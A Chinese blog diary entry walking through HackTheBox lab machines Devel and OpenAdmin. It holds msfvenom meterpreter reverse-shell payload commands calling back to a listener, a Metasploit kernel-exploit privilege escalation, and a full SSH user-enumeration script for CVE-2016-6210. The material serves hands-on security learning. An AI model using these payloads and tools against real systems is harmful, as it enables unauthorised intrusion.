2021/3/26的修行

2021-03-27

字数统计: 4k字 | 阅读时长≈ 23分

1. 上班

2. 修正博客样式

3. SDL_GameControllerDB_Util发新版本

4. HackTheBox Retired 【Devel】打掉（试过没思路最终看了tutorial……哭）

4.1 nmap

惯例nmap

$ nmap -v -A -Pn 10.129.123.162 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 00:32 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:32
Completed NSE at 00:32, 0.00s elapsed
Initiating NSE at 00:32
Completed NSE at 00:32, 0.00s elapsed
Initiating NSE at 00:32
Completed NSE at 00:32, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:32
Completed Parallel DNS resolution of 1 host. at 00:32, 0.01s elapsed
Initiating Connect Scan at 00:32
Scanning 10.129.123.162 [1000 ports]
Discovered open port 21/tcp on 10.129.123.162
Discovered open port 80/tcp on 10.129.123.162
Completed Connect Scan at 00:33, 25.62s elapsed (1000 total ports)
Initiating Service scan at 00:33
Scanning 2 services on 10.129.123.162
Completed Service scan at 00:33, 6.65s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.123.162.
Initiating NSE at 00:33
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 00:33, 6.72s elapsed
Initiating NSE at 00:33
Completed NSE at 00:33, 4.78s elapsed                                                                                                                                                                                                                                                    
Initiating NSE at 00:33                                                                                                                                                                                                                                                                  
Completed NSE at 00:33, 0.00s elapsed                                                                                                                                                                                                                                                    
Nmap scan report for 10.129.123.162                                                                                                                                                                                                                                                      
Host is up (0.25s latency).                                                                                                                                                                                                                                                              
Not shown: 998 filtered ports                                                                                                                                                                                                                                                            
PORT   STATE SERVICE VERSION                                                                                                                                                                                                                                                             
21/tcp open  ftp     Microsoft ftpd                                                                                                                                                                                                                                                      
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                                                                                                                                                                                                                   
| 03-18-17  01:06AM       <DIR>          aspnet_client                                                                                                                                                                                                                                   
| 03-17-17  04:37PM                  689 iisstart.htm                                                                                                                                                                                                                                    
|_03-17-17  04:37PM               184946 welcome.png                                                                                                                                                                                                                                     
| ftp-syst:                                                                                                                                                                                                                                                                              
|_  SYST: Windows_NT                                                                                                                                                                                                                                                                     
80/tcp open  http    Microsoft IIS httpd 7.5                                                                                                                                                                                                                                             
| http-methods:                                                                                                                                                                                                                                                                          
|   Supported Methods: OPTIONS TRACE GET HEAD POST                                                                                                                                                                                                                                       
|_  Potentially risky methods: TRACE                                                                                                                                                                                                                                                     
|_http-server-header: Microsoft-IIS/7.5                                                                                                                                                                                                                                                  
|_http-title: IIS7                                                                                                                                                                                                                                                                       
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                         
NSE: Script Post-scanning.                                                                                                                                                                                                                                                               
Initiating NSE at 00:33                                                                                                                                                                                                                                                                  
Completed NSE at 00:33, 0.00s elapsed                                                                                                                                                                                                                                                    
Initiating NSE at 00:33                                                                                                                                                                                                                                                                  
Completed NSE at 00:33, 0.00s elapsed                                                                                                                                                                                                                                                    
Initiating NSE at 00:33                                                                                                                                                                                                                                                                  
Completed NSE at 00:33, 0.00s elapsed                                                                                                                                                                                                                                                    
Read data files from: /usr/bin/../share/nmap                                                                                                                                                                                                                                             
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                                                                                                                                                           
Nmap done: 1 IP address (1 host up) scanned in 44.61 seconds

4.2 信息搜集

google Microsoft IIS httpd 7.5 cve

得到 https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-63/version_id-250989/Microsoft-Internet-Information-Server-7.5.html

行一个个试试先是CVE-2010-3972

从msf搜索CVE-2010-3972，找到auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof

等等这是个auxiliary……

这个好像是个检测件？

那算了找下一个

CVE-2010-2730 无

CVE-2010-1256 无

……接下来试了一堆奇奇怪怪地CVE，没啥收获

4.3 上传reverse shell

哦。原来这个FTP tm匿名用户竟然允许上传啊

这么弟弟吗

这直接传上去个php的webshell或者reverseshell不就……

google metasploit php reverse shell payload

得到 https://docs.j7k6.org/php-reverse-shell-metasploit/

1	msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=2468 -f raw -o shell.php

生成php reverse shell

然后

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.18
LHOST => 10.10.14.18
msf6 exploit(multi/handler) > set LPORT 2468
LPORT => 2468
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit -j

起来监听器……

本来应该是这样但是似乎 php 这台机子没法。。。

所以再来一次这次用asp

参考这个

1	https://blog.rapid7.com/2009/12/28/exploiting-microsoft-iis-with-metasploit/

先看看payloads都有哪些和asp相关的的？

1	msfvenom --list payloads

看看这个 https://netsec.ws/?p=331

1	msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=2468 -f asp > shell.asp

emmm最后怎么说呢 asp传上去以后还是无法访问就很烦

4.4 学习tutorial

啊啊啊啊啊啊啊啊啊啊题解用的是 aspx！！！！！！

这好像是唯一的不同

我tm用的asp

重来一次
下

1	msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=2468 -f aspx > shell.aspx

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.18
LHOST => 10.10.14.18
msf6 exploit(multi/handler) > set LPORT 2468
LPORT => 2468
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.18:2468

去草一下浏览器的aspx

msf6 exploit(multi/handler) > [*] Sending stage (175174 bytes) to 10.129.123.162
[*] Meterpreter session 1 opened (10.10.14.18:2468 -> 10.129.123.162:49251) at 2021-03-27 02:06:14 +0800

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

然后是提权

以下抄录一段原文

Privilege Escalation

Running sysinfo in the Meterpreter session reveals that the target is x86 architecture, so it is

possible to get fairly reliable suggestions with the local_exploit_suggester module. The same can

not be said for running the module on x64. Running the suggester gives the following

recommended escalation modules:

● exploit/windows/local/bypassuac_eventvwr

● exploit/windows/local/ms10_015_kitrap0d

● ... and 9 more ...

Going down the list, bypassauc_eventvwr fails due to the IIS user not being a part of the
administrators group, which is the default and to be expected. The second option,
ms10_015_kitrap0d, does the trick. The flags can now be obtained from
c:\Users\babis\Desktop\user.txt.txt and c:\Users\Administrator\Desktop\root.txt.txt

原来如此

还有local_exploit_suggester这种好东西啊

……试试看

先是sysinfo

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

然后local_exploit_suggester

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.129.123.162 - Collecting local exploits for x86/windows...
[*] 10.129.123.162 - 37 exploit checks are being tried...
[+] 10.129.123.162 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.123.162 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.123.162 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.129.123.162 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.129.123.162 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.123.162 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.123.162 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.129.123.162 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.123.162 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.123.162 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.123.162 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.123.162 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.129.123.162 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.

1
2
3

use exploit/windows/local/ms10_015_kitrap0d

set session -1

msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > run

4.4 复盘

4.4.1 asp不行的时候该试试aspx的

4.4.2 学会sysinfo

4.4.3 学会local_exploit_suggester

4.4.4 学会sessions的比较复杂的用法

5. HackTheBox Retired 【OpenAdmin】打了一半（又被迫看tutorial的提示了残念……过菜了）

5.1 nmap

惯例nmap

$ nmap -v -A -Pn 10.129.123.181
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 02:55 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 02:55
Completed NSE at 02:55, 0.00s elapsed
Initiating NSE at 02:55
Completed NSE at 02:55, 0.00s elapsed
Initiating NSE at 02:55
Completed NSE at 02:55, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 02:55
Completed Parallel DNS resolution of 1 host. at 02:55, 0.00s elapsed
Initiating Connect Scan at 02:55                                                                                                                                                                                                                                                         
Scanning 10.129.123.181 [1000 ports]                                                                                                                                                                                                                                                     
Discovered open port 80/tcp on 10.129.123.181                                                                                                                                                                                                                                            
Discovered open port 22/tcp on 10.129.123.181                                                                                                                                                                                                                                            
Increasing send delay for 10.129.123.181 from 0 to 5 due to 11 out of 25 dropped probes since last increase.                                                                                                                                                                             
Increasing send delay for 10.129.123.181 from 5 to 10 due to max_successful_tryno increase to 4                                                                                                                                                                                          
Increasing send delay for 10.129.123.181 from 10 to 20 due to 11 out of 28 dropped probes since last increase.                                                                                                                                                                           
Increasing send delay for 10.129.123.181 from 20 to 40 due to max_successful_tryno increase to 5                                                                                                                                                                                         
Increasing send delay for 10.129.123.181 from 40 to 80 due to 11 out of 29 dropped probes since last increase.                                                                                                                                                                           
Increasing send delay for 10.129.123.181 from 80 to 160 due to 11 out of 20 dropped probes since last increase.                                                                                                                                                                          
Increasing send delay for 10.129.123.181 from 160 to 320 due to 12 out of 38 dropped probes since last increase.                                                                                                                                                                         
Connect Scan Timing: About 20.96% done; ETC: 02:57 (0:01:57 remaining)                                                                                                                                                                                                                   
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan                                                                                                                                                                                                              
Connect Scan Timing: About 23.09% done; ETC: 02:58 (0:02:13 remaining)                                                                                                                                                                                                                   
Increasing send delay for 10.129.123.181 from 320 to 640 due to 11 out of 33 dropped probes since last increase.                                                                                                                                                                         
Increasing send delay for 10.129.123.181 from 640 to 1000 due to 11 out of 19 dropped probes since last increase.                                                                                                                                                                        
Stats: 0:01:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan                                                                                                                                                                                                              
Connect Scan Timing: About 25.67% done; ETC: 02:59 (0:03:00 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 27.87% done; ETC: 03:00 (0:03:58 remaining)                                                                                                                                                                                                                   
Stats: 0:01:53 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan                                                                                                                                                                                                              
Connect Scan Timing: About 29.77% done; ETC: 03:01 (0:04:27 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 32.24% done; ETC: 03:02 (0:05:01 remaining)                                                                                                                                                                                                                   
Stats: 0:02:41 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan                                                                                                                                                                                                              
Connect Scan Timing: About 33.40% done; ETC: 03:03 (0:05:21 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 34.83% done; ETC: 03:04 (0:05:57 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 37.10% done; ETC: 03:05 (0:06:25 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 44.10% done; ETC: 03:07 (0:06:57 remaining)                                                                                                                                                                                                                   
Stats: 0:05:49 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan                                                                                                                                                                                                              
Connect Scan Timing: About 45.30% done; ETC: 03:08 (0:07:03 remaining)                                                                                                                                                                                                                   
Stats: 0:08:15 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan                                                                                                                                                                                                              
Connect Scan Timing: About 54.84% done; ETC: 03:10 (0:06:48 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 63.49% done; ETC: 03:11 (0:06:02 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 69.46% done; ETC: 03:12 (0:05:10 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 74.54% done; ETC: 03:12 (0:04:18 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 79.86% done; ETC: 03:12 (0:03:24 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 84.96% done; ETC: 03:12 (0:02:32 remaining)                                                                                                                                                                                                                   
Connect Scan Timing: About 90.26% done; ETC: 03:12 (0:01:39 remaining)
Connect Scan Timing: About 95.36% done; ETC: 03:12 (0:00:47 remaining)
Completed Connect Scan at 03:12, 1059.60s elapsed (1000 total ports)
Initiating Service scan at 03:12
Scanning 2 services on 10.129.123.181
Completed Service scan at 03:12, 6.48s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.123.181.
Initiating NSE at 03:12
Completed NSE at 03:13, 6.62s elapsed
Initiating NSE at 03:13
Completed NSE at 03:13, 0.93s elapsed
Initiating NSE at 03:13
Completed NSE at 03:13, 0.00s elapsed
Nmap scan report for 10.129.123.181
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 03:13
Completed NSE at 03:13, 0.00s elapsed
Initiating NSE at 03:13
Completed NSE at 03:13, 0.00s elapsed
Initiating NSE at 03:13
Completed NSE at 03:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1074.06 seconds

5.2 信息搜集

google搜索 openssh 7.6p1 exploit

得到一个用户名枚举问题？

https://hackerone.com/reports/776461

然后得到一个py文件？

https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/Uro6bebk1YEHnder8oqjoQBS?response-content-disposition=attachment%3B%20filename%3D%22sshuserenumeration.py%22%3B%20filename%2A%3DUTF-8%27%27sshuserenumeration.py&response-content-type=text%2Fx-python&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ3PUIMU4J%2F20210326%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210326T193524Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjENH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJHMEUCIQDj%2BopOkZdS2vRn7brnMeukhDoQzXX2g5xwY0FdsXL4wQIgRNmrLaW0m35ANbeHnMfZQBkDjqFhJ17M3agP5xbcyLIqtAMIGhABGgwwMTM2MTkyNzQ4NDkiDKhHQxrE5BtW2W4LRSqRA3SYQMb4mZK3vaIkAYMxlzGky2P4TEohO73xuJOMAg8hh8MHEi6mYj3Re%2BL0nS8pAlTL5yl17eVY%2BXmQeQ6KZAwHvQVmv5WtINEZnioQad%2BUvd%2FqJ5%2FU2sdhcf9EzlEReqye%2FaSOVUWyEe9mo3dfQ2j0pZWHuBlwVn%2ByJ9wnNscps9RExomdg9SW4ofl6iV6d0gTXEtK7wLCO1TZHJOSwHFaYagCMKSnL732VzMZPsfozIv8HEM2K91vVgjqxSjmldvTpI%2FtwwEIUke9mVZyIUspMd0dWHpwAy98w26F1kEvn2RRGJx3CvcKdDBe313PwsquWviwbQvqZH9%2BRXJ%2Fn7Wh2QAcm7W%2BiKbHbRmtKl8AVheLIhwoaJwwkwKeSV9HkE39cjQcJAPmMjvhPAPw7VPEUVMOtEs3bcvhLSHC6biFeadhS5o9qbfo9Jd6lVZ9oowDXMAXIEc0tuX%2FZ%2FWF45Hy5aOcdqb5%2FVLRni0Y7PTHWYz1xEb0j4%2FnxomZTwXKA9G3nssetRyVmqJC%2BBo3euP7MPOY%2BIIGOusBuW%2FJoKgyQmhOX5fIipmYeqtN1rmDy6IfXDTphhAPWxfVJiXwSnX247mbw24aibKj0vFOZIQZO%2BGRs%2B9TKQcz6xZntvd4HuBkSVy1%2BRVaE2G1qoNF9LQy4uqv2ngjyh6cx3oFuvx78hZNTAAsBotPjLohyZlaxXEcAc2bdro1QYaTNcsXrULRDoZhQWdG1sIHcNNZybIN2429obUrwBFGfKNZNP15J0%2FhVOZCa8zsoH%2F%2BGO2UMiMTLZ4qoF9T8ZLRGFNN1sFEkrw6VnBYTIwAmw7uu6850l0P%2FIu7kCSQOFII7lpM1oTdd69OZA%3D%3D&X-Amz-Signature=fc894ed999a791d56a39c94f7bf77e5cab4a545213b0ec82f1f7df8a8fc779ed

sshuserenumeration.py

#!/usr/bin/python
#
# CVEs:                  CVE-2016-6210 (Credits for this go to Eddie Harari)
#
# Author:                0_o -- null_null
#                        nu11.nu11 [at] yahoo.com
#                        Oh, and it is n-u-one-one.n-u-one-one, no l's...
#                        Wonder how the guys at packet storm could get this wrong :(
# 
# Date:                  2016-07-19
# 
# Purpose:               User name enumeration against SSH daemons affected by CVE-2016-6210. 
# 
# Prerequisites:         Network access to the SSH daemon.
#
# DISCLAIMER:            Use against your own hosts only! Attacking stuff you are not 
#                        permitted to may put you in big trouble!
#
# And now - the fun part :-)
# 


import paramiko
import time
import numpy
import argparse
import sys

args = None

class bcolors:
  HEADER = '\033[95m'
  OKBLUE = '\033[94m'
  OKGREEN = '\033[92m'
  WARNING = '\033[93m'
  FAIL = '\033[91m'
  ENDC = '\033[0m'
  BOLD = '\033[1m'
  UNDERLINE = '\033[4m'


def get_args():
  parser = argparse.ArgumentParser()
  group = parser.add_mutually_exclusive_group()
  parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip")
  group.add_argument("-u", "--user", type = str, help = "Give a single user name")
  group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users")
  parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users")
  parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)")
  parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password")
  parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users")
  parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration")
  parser.add_argument("--trials", default = 1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary")
  args = parser.parse_args()
  return args


def get_banner(host, port):
  ssh = paramiko.SSHClient()
  ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  try:
    ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')
  except:
    banner = ssh.get_transport().remote_version
    ssh.close()
    return banner


def connect(host, port, user):
  global args
  starttime = 0.0
  endtime = 0.0
  p = 'B' * int(args.bytes)
  ssh = paramiko.SSHClient()
  ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  starttime=time.clock()
  try:
    ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)
  except:
    endtime=time.clock()
  finally:
    ssh.close()
    return endtime - starttime



def main():
  global args
  args = get_args()
  if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
  if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\n\n")
  if args.host:
    host = args.host.split(":")[0]
    try:
      port = int(args.host.split(":")[1])
    except IndexError:
      port = 22
  users = []
  if args.user:
    users.append(args.user)
  elif args.userlist:
    with open(args.userlist, "r") as f:
      users = f.readlines()
  else:
    if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users")
    sys.exit()
  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC +  ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)
  # get baseline timing for non-existing users...
  baseline_samples = []
  baseline_mean = 0.0
  baseline_deviation = 0.0
  if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users")
  for i in range(1, int(args.samples) + 1):
    if not args.silent: sys.stdout.write('.')
    if not args.silent: sys.stdout.flush()
    sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))
    baseline_samples.append(sample)
  if not args.silent: sys.stdout.write('\n')
  # remove the biggest and smallest value
  baseline_samples.sort()
  baseline_samples.pop()
  baseline_samples.reverse()
  baseline_samples.pop()
  # do math
  baseline_mean = numpy.mean(numpy.array(baseline_samples))
  baseline_deviation = numpy.std(numpy.array(baseline_samples))
  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.")
  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.")
  upper = baseline_mean + float(args.factor) * baseline_deviation
  if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.")
  if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...")
  # 
  # Get timing for the given user name...
  #
  for u in users:
    user = u.strip()
    enum_samples = []
    enum_mean = 0.0
    for t in range(0, int(args.trials)):
      timeval = connect(host, port, user)
      enum_samples.append(timeval)
    enum_mean = numpy.mean(numpy.array(enum_samples))
    if (enum_mean < upper):
      if not (args.enumerated or args.silent) : 
        print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
    else:
      if not args.silent: 
        print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
      else: 
        print(user)




if __name__ == "__main__":
  main()

捞到一个cve CVE-2016-6210

所以使用auxiliary/scanner/ssh/ssh_enumusers

msf6 > use auxiliary/scanner/ssh/ssh_enumusers
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS http://10.129.123.181/
RHOSTS => http://10.129.123.181/
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 10.129.123.181
RHOSTS => 10.129.123.181
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set LHOST 10.10.14.18
LHOST => 10.10.14.18
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.129.123.181:22 - SSH - Using malformed packet technique
[-] Please populate USERNAME or USER_FILE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.129.123.181:22 - SSH - Using malformed packet technique
[*] 10.129.123.181:22 - SSH - Starting scan
[+] 10.129.123.181:22 - SSH - User 'root' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.129.123.181:22 - SSH - Using malformed packet technique
[*] 10.129.123.181:22 - SSH - Starting scan
[+] 10.129.123.181:22 - SSH - User 'admin' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME aaa
USERNAME => aaa
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.129.123.181:22 - SSH - Using malformed packet technique
[*] 10.129.123.181:22 - SSH - Starting scan
[+] 10.129.123.181:22 - SSH - User 'aaa' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME dfwedaferwvrwevrea3gqr3eg
USERNAME => dfwedaferwvrwevrea3gqr3eg
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 10.129.123.181:22 - SSH - Using malformed packet technique
[*] 10.129.123.181:22 - SSH - Starting scan
[+] 10.129.123.181:22 - SSH - User 'dfwedaferwvrwevrea3gqr3eg' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) >

这件tm能用？？？

emmm没思路

5.3 gobuster一波

gobuster dir -u http://10.129.123.181/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

得到music页

点击右上角login进入ona

页面左侧显示

Newer Version Available	Min/Max
 You are NOT on the latest release version
Your version    = v18.1.1
Latest version = Unable to determine

Please DOWNLOAD the latest version.

点击 DOWNLOAD the latest version 超链接，获得这个网页管理软件的名字为OpenNetAdmin

用OpenNetAdmin和版本号v18.1.1取得CVE

……也可以直接去metasploit源码里全文搜索OpenNetAdmin就完事了

找到exp exploit/unix/webapp/opennetadmin_ping_cmd_injection

本文作者： XenoAmess
本文链接： http://xenoamess.com/2021/03/27/20210326修行/
版权声明：
本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。